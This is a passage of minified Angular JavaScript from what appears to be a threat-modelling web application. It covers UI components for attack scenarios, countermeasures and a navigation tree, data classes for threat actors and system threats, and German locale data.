"),u(),s(22,"\n "),u(),s(23,"\n "),ne(24,nRe,6,4,"button",6),s(25,"\n "),ln(),m(26,"button",2),he("click",function(){return i.AddCountermeasure(i.selectedComponent)}),oe(27,"translate"),s(28,"\n "),m(29,"mat-icon"),s(30,"security"),u(),s(31,"\n "),u(),s(32,"\n "),u(),s(33,"\n "),m(34,"table",7),he("dragover",function(r){return i.AllowDrop(r)}),s(35,"\n "),m(36,"tbody"),s(37,"\n "),ne(38,cRe,13,3,"tr",8),s(39,"\n "),m(40,"tr"),s(41,"\n "),m(42,"td")(43,"p",9),s(44),oe(45,"translate"),u()(),s(46,"\n "),m(47,"td",10),s(48,"\n "),m(49,"div",11),s(50,"\n "),m(51,"button",12),s(52),oe(53,"translate"),u(),s(54,"\n "),u(),s(55,"\n "),m(56,"div",11),s(57,"\n "),m(58,"button",13),s(59),oe(60,"translate"),u(),s(61,"\n "),u(),s(62,"\n "),m(63,"div",11),s(64,"\n "),m(65,"button",14),s(66),oe(67,"translate"),u(),s(68,"\n "),u(),s(69,"\n "),m(70,"div",11),s(71,"\n "),m(72,"button",15),s(73),oe(74,"translate"),u(),s(75,"\n "),u(),s(76,"\n "),u(),s(77,"\n "),u(),s(78,"\n "),u(),s(79,"\n "),u(),s(80,"\n\n "),it(81,"div",16),s(82," \n "),m(83,"mat-menu",null,17),s(85," \n "),ne(86,uRe,3,1,"ng-template",18),s(87," \n "),u(),s(88," \n"),u()),2&e){const n=Ti(84);g(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),g(2),at("matTooltip",re(5,40,"pages.modeling.diagram.addAttackScenario")),F("disabled",!i.selectedComponent),g(7),at("matTooltip",re(12,42,"pages.modeling.diagram.CveSearch")),F("disabled",!i.selectedComponent),g(6),Rt("fill",i.selectedComponent?i.theme.IsDarkMode?"#FFF":"#000":i.theme.IsDarkMode?"#676767":"#B6B6B6"),g(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),g(5),F("ngIf",i.dataService.Project.HasTesting),g(2),at("matTooltip",re(27,44,"pages.modeling.diagram.addCountermeasure")),F("disabled",!i.selectedComponent),g(12),F("ngForOf",i.GetGroups()),g(6),ke(re(45,46,"pages.modeling.stack.legend")),g(7),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),g(1),ct("\n ",re(53,48,"pages.modeling.stack.ActiveComponent"),"\n "),g(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),g(1),ct("\n ",re(60,50,"pages.modeling.stack.InactiveComponent"),"\n "),g(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),g(1),ct("\n ",re(67,52,"pages.modeling.stack.ThirdPartyComponent"),"\n "),g(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),g(1),ct("\n ",re(74,54,"pages.modeling.stack.OutOfScopeComponent"),"\n "),g(8),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,oa,Hh,da,Xo,qo,po,el,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:30px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 70px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.group[_ngcontent-%COMP%]{transform-origin:center;transform:rotate(-90deg);text-align:center;margin:0;font-weight:700;font-size:smaller;max-width:100px}.component-base[_ngcontent-%COMP%], .component[_ngcontent-%COMP%]{background:none;margin:5px;cursor:pointer;border-radius:5px}.component[_ngcontent-%COMP%]{font-size:large;height:75px;min-width:130px;border-radius:10px}.component-dark[_ngcontent-%COMP%]{border-color:#fff;color:#fff}.component-third-party[_ngcontent-%COMP%]{background-color:#ffffff1a}.component-port[_ngcontent-%COMP%]{position:absolute;left:4px;bottom:4px;border:2px solid;padding:0 2px}.component-legend[_ngcontent-%COMP%]{font-size:small;height:25px;min-width:60px;border-radius:5px}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}',".heavy[_ngcontent-%COMP%] {\n font: bold 10px sans-serif;\n }"]}),t})(),xa=(()=>{class t{constructor(){this.Nodes=[],this.nodeTreeChanged=new Tt}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}FindNodeOfObject(e){return t.findNodeOfObjectRec(e,this.Nodes)}static TransferExpandedState(e,i){if(null==e||null==i)return;let n=t.FlattenNodes(e);t.FlattenNodes(i).forEach(c=>{if(null!=c.data){let d=n.find(T=>T.data==c.data);d&&null!=d.isExpanded&&(c.isExpanded=d.isExpanded)}else{let d=n.filter(T=>T.name()==c.name()&&null==T.data);1==(null==d?void 0:d.length)&&d[0]&&null!=d[0].isExpanded&&(c.isExpanded=d[0].isExpanded)}})}static FlattenNodes(e){let i=[],n=r=>{r.forEach(c=>{i.push(c),c.children&&n(c.children)})};return n(e),i}static FindNodeOfObject(e,i){return t.findNodeOfObjectRec(e,i)}static findNodeOfObjectRec(e,i){for(let n=0;n{class t{constructor(e,i){this.theme=e,this.dataService=i,this.treeControl=new Rz(n=>n.children),this.dataSource=new HW,this.checkEnabled=!0,this.canCheckMultiple=!0,this.selectedNodeChanged=new Tt,this.checkedNodesChanged=new Tt,this.nodeDoubleClicked=new Tt,this.menuTopLeftPosition={x:"0",y:"0"},this.HasChild=(n,r)=>!!r.children&&r.children.length>0}get activeNode(){return this._activeNode}set activeNode(e){this._activeNode=e,this.selectedNodeChanged.emit(e),setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}set checkedNodes(e){xa.FlattenNodes(this.dataSource.data).forEach(n=>{n.isChecked=null==e?void 0:e.some(r=>r.data==n.data)})}ngOnInit(){}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}OnMoveUp(e){e.onMoveUp(),this.resetDataSource()}OnMoveDown(e){e.onMoveDown(),this.resetDataSource()}OnMoveToGroup(e,i){e.onMoveToGroup(i)}OnCollapse(e,i){var n,r,c,d;1==i?null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.collapse(T)):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.forEach(q=>this.treeControl.collapse(q))}):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.treeControl.collapse(T)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.treeControl.collapse(T)))}OnExpand(e,i){var n,r,c,d;1==i?(this.treeControl.expand(e),null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.expand(T))):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>this.OnExpand(T,1)):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.OnExpand(T,1)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.OnExpand(T,1)))}SetNavTreeData(e,i=null){this.activeNode=null,i&&(this.activeNode=e.find(r=>r.data==i)),this.dataSource.data=e,xa.FlattenNodes(e).forEach(r=>{(r.isExpanded||null==r.isExpanded&&r.children&&r.children.length>0)&&(r.isExpanded=!0,this.treeControl.expand(r))})}OnNodeClick(e,i){i.stopPropagation(),!(!e.canSelect||e.isInactive&&e.isInactive())&&(this.activeNode=e)}OnNodeDoubleClick(e){!e.canSelect||this.nodeDoubleClicked.emit(e)}OnNodeChecked(e){!this.canCheckMultiple&&!e.isChecked&&xa.FlattenNodes(this.dataSource.data).forEach(i=>i.isChecked=!1),e.isChecked=!e.isChecked,this.checkedNodesChanged.emit(xa.FlattenNodes(this.dataSource.data).filter(i=>i.isChecked))}OnEditName(e){e.isRenaming=!0,setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}OnRename(e,i){("Enter"===e.key||"focusout"===e.type)&&(i.isRenaming=!1,i.onRename&&i.onRename(e.target.value))}resetDataSource(){let e=this.dataSource.data;this.dataSource.data=null,this.dataSource.data=e}CanSelet(e){return e.canSelect&&!(e.isInactive&&e.isInactive())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-nav-tree"]],viewQuery:function(e,i){if(1&e&&Mi(hRe,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{activeNode:"activeNode",checkEnabled:"checkEnabled",canCheckMultiple:"canCheckMultiple",checkedNodes:"checkedNodes"},outputs:{selectedNodeChanged:"selectedNodeChanged",checkedNodesChanged:"checkedNodesChanged",nodeDoubleClicked:"nodeDoubleClicked"},decls:30,vars:8,consts:[[1,"nav-tree",2,"background-color","transparent",3,"dataSource","treeControl"],["matTreeNodeToggle","","class","disable-select",3,"highlight-light","highlight-dark","font-weight","cursor","click","dblclick","contextmenu",4,"matTreeNodeDef"],["class","disable-select",3,"cursor","click","dblclick","contextmenu",4,"matTreeNodeDef","matTreeNodeDefWhen"],["menuMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["groupsMenu","matMenu"],["matTreeNodeToggle","",1,"disable-select",3,"click","dblclick","contextmenu"],["color","primary","style","margin-right: 5px;",3,"disabled","checked","change",4,"ngIf"],["style","margin-right: 5px;",4,"ngIf"],["style","margin-right: 10px; margin-left: 5px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["style","margin-right: 10px; margin-left: -5px; font-size: smaller;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],[4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip",4,"ngIf"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["style","margin-left: auto; margin-right: 5px; opacity: 1;",4,"ngIf"],["color","primary",2,"margin-right","5px",3,"disabled","checked","change"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","-5px","font-size","smaller",3,"matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["mat-menu-item","",3,"click"],[2,"margin-left","auto","margin-right","5px","opacity","1"],[1,"disable-select",3,"click","dblclick","contextmenu"],[1,"mat-tree-node"],["mat-icon-button","","matTreeNodeToggle","",3,"click"],[1,"mat-icon-rtl-mirror",2,"opacity","1"],["style","margin-right: 10px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["mat-icon-button","","style","margin-left: auto; margin-right: 5px; opacity: 1;","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip",4,"ngIf"],["style","margin-right: 5px; opacity: 1;",3,"marginLeft",4,"ngIf"],["role","group"],["matTreeNodeOutlet",""],["matTooltipShowDelay","1000",2,"margin-right","10px",3,"matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","5px","opacity","1",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],[2,"margin-right","5px","opacity","1"],["mat-menu-item","",3,"matMenuTriggerFor"],["collapseMenu","matMenu"],["expandMenu","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor","matMenuTriggerData"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"mat-tree",0),s(1,"\n "),s(2,"\n "),s(3,"\n "),ne(4,DRe,30,20,"mat-tree-node",1),s(5,"\n "),s(6,"\n "),ne(7,VRe,45,21,"mat-nested-tree-node",2),s(8,"\n"),u(),s(9,"\n\n"),m(10,"mat-menu",null,3),s(12,"\n "),ne(13,URe,33,8,"ng-template",4),s(14," \n"),u(),s(15,"\n\n"),it(16,"div",5,6),s(18," \n"),m(19,"mat-menu",null,7),s(21," \n "),ne(22,jRe,33,18,"ng-template",4),s(23," \n"),u(),s(24," \n"),m(25,"mat-menu",null,8),s(27,"\n "),ne(28,$Re,3,1,"ng-template",4),s(29," \n"),u()),2&e){const n=Ti(20);F("dataSource",i.dataSource)("treeControl",i.treeControl),g(7),F("matTreeNodeDefWhen",i.HasChild),g(9),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,oa,J3,Kw,Yw,Xw,Y3,ab,br,da,Xo,qo,po,el,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.mat-tree-node[_ngcontent-%COMP%]{min-height:28px!important;height:28px}.mat-tree-node[_ngcontent-%COMP%]:hover .mat-icon[_ngcontent-%COMP%]{opacity:1}.mat-tree-node[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%]{opacity:.4}.nav-tree-invisible[_ngcontent-%COMP%]{display:none}.nav-tree[_ngcontent-%COMP%] ul[_ngcontent-%COMP%], .nav-tree[_ngcontent-%COMP%] li[_ngcontent-%COMP%]{margin-top:0;margin-bottom:0;list-style-type:none}.nav-tree[_ngcontent-%COMP%] .mat-nested-tree-node[_ngcontent-%COMP%] div[role=group][_ngcontent-%COMP%]{padding-left:20px}.nav-tree[_ngcontent-%COMP%] div[role=group][_ngcontent-%COMP%] > .mat-tree-node[_ngcontent-%COMP%]{padding-left:20px}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-light[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.highlight-dark[_ngcontent-%COMP%] .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.mat-icon-button[_ngcontent-%COMP%]{width:30px}.disable-select[_ngcontent-%COMP%]{user-select:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none}"]}),t})(),CT=(()=>{class t{constructor(){this.showLeftBar=!0}OnSameRoute(){this.showLeftBar=!this.showLeftBar}SetNavTreeData(e){this.navTree.SetNavTreeData(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],viewQuery:function(e,i){if(1&e&&Mi(df,5),2&e){let n;Vt(n=Bt())&&(i.navTree=n.first)}},decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})();class dM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["Application","Sector","Function","Features","Connectivity","LocEnv","Accessories","ProductionProcess","Criticality","Requirements","TargetMarket","Standards","InvolvedPeople","Budget","Timeframe","ExpectedOutput","Assumptions"],this.project=e,this.config=i,this.Sector||(this.Sector=[]),this.Function||(this.Function=[]),this.Features||(this.Features=[]),this.Accessories||(this.Accessories=[]),this.Application||(this.Application=[]),this.Requirements||(this.Requirements=[]),this.Criticality||(this.Criticality=[]),this.LocEnv||(this.LocEnv=[]),this.Connectivity||(this.Connectivity=[]),this.ProductionProcess||(this.ProductionProcess=[]),this.TargetMarket||(this.TargetMarket=[]),this.Standards||(this.Standards=[]),this.InvolvedPeople||(this.InvolvedPeople=[]),this.Budget||(this.Budget=[]),this.Timeframe||(this.Timeframe=[]),this.ExpectedOutput||(this.ExpectedOutput=[]),this.Assumptions||(this.Assumptions=[])}get Sector(){return this.Data.Sector}set Sector(a){this.Data.Sector=a}get Function(){return this.Data.Function}set Function(a){this.Data.Function=a}get Features(){return this.Data.Features}set Features(a){this.Data.Features=a}get Accessories(){return this.Data.Accessories}set Accessories(a){this.Data.Accessories=a}get Application(){return this.Data.Application}set Application(a){this.Data.Application=a}get Requirements(){return this.Data.Requirements}set Requirements(a){this.Data.Requirements=a}get Criticality(){return this.Data.Criticality}set Criticality(a){this.Data.Criticality=a}get LocEnv(){return this.Data.LocEnv}set LocEnv(a){this.Data.LocEnv=a}get Connectivity(){return this.Data.Connectivity}set Connectivity(a){this.Data.Connectivity=a}get ProductionProcess(){return this.Data.ProductionProcess}set ProductionProcess(a){this.Data.ProductionProcess=a}get TargetMarket(){return this.Data.TargetMarket}set TargetMarket(a){this.Data.TargetMarket=a}get Standards(){return this.Data.Standards}set Standards(a){this.Data.Standards=a}get InvolvedPeople(){return this.Data.InvolvedPeople}set InvolvedPeople(a){this.Data.InvolvedPeople=a}get Budget(){return this.Data.Budget}set Budget(a){this.Data.Budget=a}get Timeframe(){return this.Data.Timeframe}set Timeframe(a){this.Data.Timeframe=a}get ExpectedOutput(){return this.Data.ExpectedOutput}set ExpectedOutput(a){this.Data.ExpectedOutput=a}get Assumptions(){return this.Data.Assumptions}set Assumptions(a){this.Data.Assumptions=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new dM(a,e,i)}}class mM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["DeviceGoals","BusinessGoals","BusinessImpact"],this.project=e,this.config=i,this.DeviceGoals||(this.DeviceGoals=[]),this.BusinessGoals||(this.BusinessGoals=[]),this.BusinessImpact||(this.BusinessImpact=[])}get DeviceGoals(){return this.Data.DeviceGoals}set DeviceGoals(a){this.Data.DeviceGoals=a}get BusinessGoals(){return this.Data.BusinessGoals}set BusinessGoals(a){this.Data.BusinessGoals=a}get BusinessImpact(){return this.Data.BusinessImpact}set BusinessImpact(a){this.Data.BusinessImpact=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new mM(a,e,i)}}class Gp extends Ln{constructor(a,e,i){super(a),this.project=e,this.Motive||(this.Motive=[]),this.Capabilities||(this.Capabilities=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Motive(){return this.Data.Motive}set Motive(a){this.Data.Motive=a}get Capabilities(){return this.Data.Capabilities}set Capabilities(a){this.Data.Capabilities=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=a}CheckUniqueNumber(){return this.project.GetThreatActors().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TS"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetThreatSources().RemoveThreatActor(this)}static FromJSON(a,e,i){return new Gp(a,e,i)}}class uM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.sourceIDs||(this.Data.sourceIDs=[])}get Sources(){let a=[];return this.Data.sourceIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set Sources(a){this.Data.sourceIDs=null==a?void 0:a.map(e=>e.ID)}AddThreatActor(a){this.Sources.includes(a)||this.Data.sourceIDs.push(a.ID)}RemoveThreatActor(a){this.Sources.includes(a)&&this.Data.sourceIDs.splice(this.Data.sourceIDs.indexOf(a.ID),1)}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new uM(a,e,i)}}class hM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Impact||(this.Impact=dr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get AffectedAssetObjects(){let a=[];return this.Data.affectedAssetObjectIDs&&(this.project.GetAssetGroups().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e)),this.project.GetMyDatas().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e))),a}set AffectedAssetObjects(a){this.Data.affectedAssetObjectIDs=null==a?void 0:a.map(e=>e.ID)}get ThreatCategory(){return this.config.GetThreatCategory(this.Data.threatCategoryID)}set ThreatCategory(a){this.Data.threatCategoryID=null==a?void 0:a.ID,a&&(this.Data.ImpactCats=JSON.parse(JSON.stringify(a.ImpactCats)))}get ImpactCats(){return this.Data.ImpactCats}get Impact(){return this.Data.Impact}set Impact(a){this.Data.Impact=a}CheckUniqueNumber(){return this.project.GetSystemThreats().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"ST"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>n.SystemThreats.includes(this)).forEach(n=>i.push({Type:li.RemoveSystemThreatFromAttackScenario,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveSystemThreatFromAttackScenario){const r=n.Param;r.SystemThreats=r.SystemThreats.filter(c=>c.ID!=this.ID)}})}static FromJSON(a,e,i){return new hM(a,e,i)}}const Js=void 0;!function xre(t,a,e){(function eae(t,a,e){"string"!=typeof a&&(e=a,a=t[Ji.LocaleId]),a=a.toLowerCase().replace(/_/g,"-"),c1[a]=t,e&&(c1[a][Ji.ExtraData]=e)})(t,a,e)}(["de",[["AM","PM"],Js,Js],Js,[["S","M","D","M","D","F","S"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["S","M","D","M","D","F","S"],["So","Mo","Di","Mi","Do","Fr","Sa"],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan.","Feb.","M\xe4rz","Apr.","Mai","Juni","Juli","Aug.","Sept.","Okt.","Nov.","Dez."],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","M\xe4r","Apr","Mai","Jun","Jul","Aug","Sep","Okt","Nov","Dez"],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["v. Chr.","n. Chr."],Js,Js],1,[6,0],["dd.MM.yy","dd.MM.y","d. MMMM y","EEEE, d. MMMM y"],["HH:mm","HH:mm:ss","HH:mm:ss z","HH:mm:ss zzzz"],["{1}, {0}",Js,"{1} 'um' {0}",Js],[",",".",";","%","+","-","E","\xb7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0\xa0%","#,##0.00\xa0\xa4","#E0"],"EUR","\u20ac","Euro",{ATS:["\xf6S"],AUD:["AU$","$"],BGM:["BGK"],BGO:["BGJ"],BYN:[Js,"\u0440."],CUC:[Js,"Cub$"],DEM:["DM"],FKP:[Js,"Fl\xa3"],GHS:[Js,"\u20b5"],GNF:[Js,"F.G."],KMF:[Js,"FC"],PHP:[Js,"\u20b1"],RON:[Js,"L"],RUR:[Js,"\u0440."],RWF:[Js,"F.Rw"],SYP:[],THB:["\u0e3f"],TWD:["NT$"],XXX:[],ZMW:[Js,"K"]},"ltr",function KRe(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}],"de",[[["Mitternacht","morgens","vorm.","mittags","nachm.","abends","nachts"],void 0,["Mitternacht","morgens","vormittags","mittags","nachmittags","abends","nachts"]],[["Mitternacht","Morgen","Vorm.","Mittag","Nachm.","Abend","Nacht"],void 0,["Mitternacht","Morgen","Vormittag","Mittag","Nachmittag","Abend","Nacht"]],["00:00",["05:00","10:00"],["10:00","12:00"],["12:00","13:00"],["13:00","18:00"],["18:00","24:00"],["00:00","05:00"]]]);let T5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="shortDate"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDate",type:t,pure:!0}),t})(),E5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="medium"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDateTime",type:t,pure:!0}),t})(),YRe=(()=>{class t extends q1{constructor(e){super(),this.translateService=e,this.getRangeLabel=(i,n,r)=>{const c=this.translateService?this.translateService.instant("paginator.of"):"of";if(0===r||0===n)return"0 "+c+" "+r;const d=i*n>(r=Math.max(r,0))?(Math.ceil(r/n)-1)*n:i*n;return d+1+" - "+Math.min(d+n,r)+" "+c+" "+r},this.translateService.onLangChange.subscribe(i=>{this.translateLabels()}),this.translateLabels()}injectTranslateService(e){this.translateService=e,this.translateService.onLangChange.subscribe(()=>{this.translateLabels()}),this.translateLabels()}translateLabels(){this.firstPageLabel=this.translateService.instant("paginator.firstPage"),this.itemsPerPageLabel=this.translateService.instant("paginator.itemsPerPage"),this.lastPageLabel=this.translateService.instant("paginator.lastPage"),this.nextPageLabel=this.translateService.instant("paginator.nextPage"),this.previousPageLabel=this.translateService.instant("paginator.previousPage"),this.changes.next()}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),yT=(()=>{class t{constructor(e,i){this.translate=e,this.locStorage=i,this.locale=this.locStorage.Get(si.LANGUAGE)}get Locale(){return this.locale||"en"}set Locale(e){this.locale=e,this.translate.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(At(Sn),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function JRe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"info"),u()),2&t&&at("matTooltip",re(1,1,"general.Info"))}function ZRe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"check_circle"),u()),2&t&&at("matTooltip",re(1,1,"general.Success"))}function eSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"warning"),u()),2&t&&at("matTooltip",re(1,1,"general.Warning"))}function 